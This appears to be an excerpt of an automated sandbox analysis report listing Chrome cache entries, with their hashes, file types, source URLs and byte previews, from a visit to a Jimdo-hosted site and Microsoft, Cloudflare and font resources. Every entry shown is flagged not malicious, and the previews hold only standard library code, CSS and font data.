SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/favicon.ico?v2
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
Category:	downloaded
Size (bytes):	18596
Entropy (8bit):	7.988788312296589
Encrypted:	false
SSDEEP:
MD5:	C83E4437A53D7F849F9D32DF3D6B68F3
SHA1:	FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
SHA-256:	D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
SHA-512:	C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
Preview:	wOF2......H...........H=................................\|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q.......uD.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..\|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.\|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..\|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (955), with CRLF line terminators
Category:	downloaded
Size (bytes):	201253
Entropy (8bit):	2.661810841903416
Encrypted:	false
SSDEEP:
MD5:	85DE642E1467807F64F7E10807DF3869
SHA1:	C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
SHA-256:	5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
SHA-512:	BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
Preview:	..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	15
Entropy (8bit):	3.189898095464287
Encrypted:	false
SSDEEP:
MD5:	39A19D0882684989864FA50BCED6A2D1
SHA1:	5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
SHA-256:	8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
SHA-512:	E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
Malicious:	false
Reputation:	unknown
URL:	https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Preview:	/* empty css */

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	4802
Entropy (8bit):	5.415883081641602
Encrypted:	false
SSDEEP:
MD5:	A90A2E5B9A3C097A815681A49DA9E6A1
SHA1:	1142CB363AB1A35E64546ED886CFD00B5093F504
SHA-256:	308FCE1E8CC31B982E8ED8A78A0729F7935F0056FDCE41483C59691B1339599E
SHA-512:	B006B37B8EBF9FFBF3291AB773CE36E6F8AC671FE63DF080596C102E5651CB7B12FDBE407645ACFF84101EDDD777564BED23B66B12EC10CFE30B6420643B58E8
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Roboto:400,700"
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstat

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 85 x 68, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.014960565232002
Encrypted:	false
SSDEEP:
MD5:	F869F09870417E960DED66D97A6090B6
SHA1:	490F1F79C51B26F8DA759C4562136E45ADAEE00E
SHA-256:	3BC2620019E1B8A2BD5160BD5AB22C76D29EE171ECA86B602C91FCF71AC927F7
SHA-512:	D5B7858D0E2515B8F6A4FB92D1DE42BE0935F37BE3A175EDA3FC665EA14FEDAA57DA3318EF1ADFE407B717683A7DE6B2907A763BDCC285EDE9521444995A3A42
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e58fe32bf9843dc/1732111513482/2a7SCQ4Nwa7O04Y
Preview:	.PNG........IHDR...U...D........3....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (41651)
Category:	downloaded
Size (bytes):	131537
Entropy (8bit):	5.2237799798561975
Encrypted:	false
SSDEEP:
MD5:	30B7C335C62E5269E2D35B8E8B9F44B4
SHA1:	C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
SHA-256:	10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
SHA-512:	5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
Preview:	(function(){/*. @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. /.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a[""]\|\|{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0\|\|r===1&&n[2]===".."\|\|n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u\|\|y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65458)
Category:	dropped
Size (bytes):	6023265
Entropy (8bit):	5.618613396653052
Encrypted:	false
SSDEEP:
MD5:	F218D1E4755A4CEA54EA2355A8B50B44
SHA1:	76BA44951D7774D3303950C564200A78B1327FF8
SHA-256:	F274632A5EAD6DD6107CF3609DB8C1806C89686CD74233053F36021529D5F0B0
SHA-512:	02A02EC496AFDD628FDF63999B0A8676C9F8686C1A5F5497C3A73311E7D1C7317081E14226593BD959CD36DA228A7F5D46B4D16A05481056A94FF74BD6C49AA7
Malicious:	false
Reputation:	unknown
Preview:	/! For license information please see 7ca431ae6a60c21bf2bf.js.LICENSE.txt /.(()=>{var e,t,i,n,a={58695:(e,t,i)=>{"use strict";i(33893).Cookie;var n=i(76046);t.u5=n.CKies,n.CookieOptions,n.CookieType},76046:(e,t,i)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n,a,o=i(33893);!function(e){e.NECESSARY="necessary",e.FUNCTIONAL="functional",e.PERFORMANCE="performance",e.MARKETING="marketing"}(n=t.CookieType\|\|(t.CookieType={})),function(e){e.ALLOW="allow",e.DENY="deny"}(a=t.CookieOptions\|\|(t.CookieOptions={})),t.CONFIG_EXPIRATION=31536e6;var r=function(){function e(){}return e.getExpireDate=function(){var e=new Date;return e.setTime(e.getTime()+t.CONFIG_EXPIRATION),e},e.key=function(e){return"ckies_"+e},e.use=function(e){return e===n.NECESSARY\|\|(this.isOptIn()?o.Cookie.get(this.key(e))===a.ALLOW:o.Cookie.get(this.key(e))!==a.DENY)},e.deny=function(e){this.set(e,a.DENY)},e.allow=function(e){this.set(e,a.ALLOW)},e.useNecessary=function(){return this.use(n.NECESSARY)},e.

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 126

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (7929)
Category:	downloaded
Size (bytes):	17735
Entropy (8bit):	5.522438963476012
Encrypted:	false
SSDEEP:
MD5:	913D36C6BBE2B8EA9EB63792646FF536
SHA1:	BDD7DCCBDCF1AD132EB8B5BBCC03D2C7384F0C34
SHA-256:	22C926C44AC81E4061E97B6732791BE369BDD6F226ABB321CFB52891DC9A11DD
SHA-512:	8757047A9B67B483F248A777CCF963EF05470377C801E8705817978A321948F9F826C06EFAD9763760C210F6AF03B8EBE0D4A6BC2A4A6A72AB1E268077E5775C
Malicious:	false
Reputation:	unknown
URL:	https://shadowline-hub-uk-limited.jimdosite.com/
Preview:	<!doctype html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="format-detection" content="telephone=no">. <link rel="preconnect" href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/" crossorigin>. <link rel="preconnect" href="https://jimdo-storage.freetls.fastly.net/" crossorigin>. <link rel="preconnect" href="https://fonts.jimstatic.com/" crossorigin>. <link rel='shortcut icon' type='image/png' href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png" />. <title>Home \| Shadowline Hub UK Limited</title>. <script>. window.__dolphin_environment__ = 'prod';. </script>. . <meta name="robots" content="noindex, nofollow, noarchive"><meta name="twitter:card" content="summary_large_image">.<meta property="og:type" content="website">.<meta property="og:title" content="Hom

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32089)
Category:	downloaded
Size (bytes):	92629
Entropy (8bit):	5.303443527492463
Encrypted:	false
SSDEEP:
MD5:	397754BA49E9E0CF4E7C190DA78DDA05
SHA1:	AE49E56999D82802727455F0BA83B63ACD90A22B
SHA-256:	C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
SHA-512:	8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
Malicious:	false
Reputation:	unknown
URL:	https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Preview:	/! jQuery v1.9.1 \| (c) 2005, 2012 jQuery Foundation, Inc. \| jquery.org/license.//@ sourceMappingURL=jquery.min.map./(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d\.\|)\d+(?:[eE][+-]?\d+\|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]\|#([\w-]))$/,C=/^<(\w+)\s\/?>(?:<\/\1>\|)$/,k=/^[\],:{}\s]$/,E=/(?:^\|:\|,)(?:\s\[)+/g,S=/\\(?:["\\\/bfnrt]\|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"\|true\|false\|null\|-?(?:\d+\.\|)\d+(?:[eE][+-]?\d+\|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener\|\|"load"===e.type\|\|"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1700
Entropy (8bit):	5.3411077766821125
Encrypted:	false
SSDEEP:
MD5:	33E70261AA35332F2CCEA37DD6E403B5
SHA1:	6C9E0966509BFA7D970958B0829BAA1BC65C573E
SHA-256:	B70E4E2DE1A4E918B7A1ABFAA38889F5668D810941EA4206BEF4823F0EC6CADE
SHA-512:	E1CC39C0A53155AD435FD58C434801B14B85DC9875CF968D8B1A1FBF20AD7E786C352DAFE3D6C87768BF0135E8E57257E3E8BE48D254F56CB0AAA3B7C3B32402
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Poppins:600,700"
Preview:	/* latin-ext /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./ latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 700;. font-display: swap;. src: url(https://fonts.jimsta

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
Category:	downloaded
Size (bytes):	563851
Entropy (8bit):	5.221453271093944
Encrypted:	false
SSDEEP:
MD5:	12DD1E4D0485A80184B36D158018DE81
SHA1:	EB2594062E90E3DCD5127679F9C369D3BF39D61C
SHA-256:	A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
SHA-512:	F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
Malicious:	false
Reputation:	unknown
URL:	https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
Preview:	@charset "UTF-8";/! @ms-mwf/mwf - v1.25.0+6321934 \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.//! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 26288, version 0.0
Category:	downloaded
Size (bytes):	26288
Entropy (8bit):	7.984195877171481
Encrypted:	false
SSDEEP:
MD5:	D0263DC03BE4C393A90BDA733C57D6DB
SHA1:	8A032B6DEAB53A33234C735133B48518F8643B92
SHA-256:	22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
SHA-512:	9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
Preview:	wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap..............9cvt ...4... .......fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.\|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.\|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0\|.>...O.g...E.2\|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U

Chrome Cache Entry: 132

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 134

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47671)
Category:	downloaded
Size (bytes):	47672
Entropy (8bit):	5.401921124762015
Encrypted:	false
SSDEEP:
MD5:	B804BCD42117B1BBE45326212AF85105
SHA1:	7B4175AAF0B7E45E03390F50CB8ED93185017014
SHA-256:	B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
SHA-512:	9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
Preview:	"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 135

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
Category:	downloaded
Size (bytes):	18536
Entropy (8bit):	7.986571198050597
Encrypted:	false
SSDEEP:
MD5:	8EFF0B8045FD1959E117F85654AE7770
SHA1:	227FEE13CEB7C410B5C0BB8000258B6643CB6255
SHA-256:	89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
SHA-512:	2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......Hh..........H..............................Z..\|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.\|.......%..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.+.M E..`......R.$T

Chrome Cache Entry: 136

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64241)
Category:	downloaded
Size (bytes):	167730
Entropy (8bit):	5.045981547409661
Encrypted:	false
SSDEEP:
MD5:	AFB5C64B13342F6E568093548D0A2A9F
SHA1:	95FC121CCCFDBA12443CF87A9C823486065A14AB
SHA-256:	238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
SHA-512:	6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
